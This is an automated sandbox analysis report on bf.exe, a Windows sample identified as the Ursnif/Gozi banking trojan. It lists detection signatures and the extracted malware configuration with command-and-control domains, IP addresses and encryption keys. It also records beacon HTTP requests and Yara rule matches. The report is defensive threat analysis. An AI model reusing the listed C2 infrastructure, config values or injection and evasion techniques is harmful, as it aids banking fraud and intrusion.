Windows Analysis Report
bf.exe

Overview

General Information

Sample Name: bf.exe
Analysis ID: 722154
MD5: b7ce4f9f6ecd85bb5edbb6964226fdb6
SHA1: 12b28a42e960dfc522348eba37b00ea74a0df527
SHA256: bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb
Tags: exegozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: bf.exe Virustotal: Detection: 76%
Source: bf.exe Avira: detected
Source: bf.exe Joe Sandbox ML: detected
Source: 0.0.bf.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: bf.exe Malware Configuration Extractor: Ursnif {"RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "10103", "server": "50", "serpent_key": "AFRkxxddsKAnRl2J", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: bf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: ntdll.pdb source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp

Networking

Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49696 -> 45.8.158.104:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49696 -> 45.8.158.104:80
Source: Joe Sandbox View ASN Name: ASBAXETNRU
Source: Joe Sandbox View IP Address: 45.8.158.104
Source: global traffic HTTP traffic detected: GET /uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: query: trackingg-protectioon.cdn1.mozilla.net reply code: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: bf.exe, 00000000.00000003.612015496.00000000006D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmG
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000005.00000003.638688227.000001C32A171000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsofU
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000000B.00000000.717723054.000000000F014000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://trackingg-protectioon.cdn1.mozilla.net/uploaded/OpQxWz98QKMWv_2/FDwCe9CiLqhz94zXhO/jzUmpRbDp/
Source: explorer.exe, 0000000B.00000000.699574757.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723471805.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.667027858.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: trackingg-protectioon.cdn1.mozilla.net

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Source: Yara match File source: the same memory dumps, process memory spaces and unpacked PE files listed under Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\bf.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: bf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
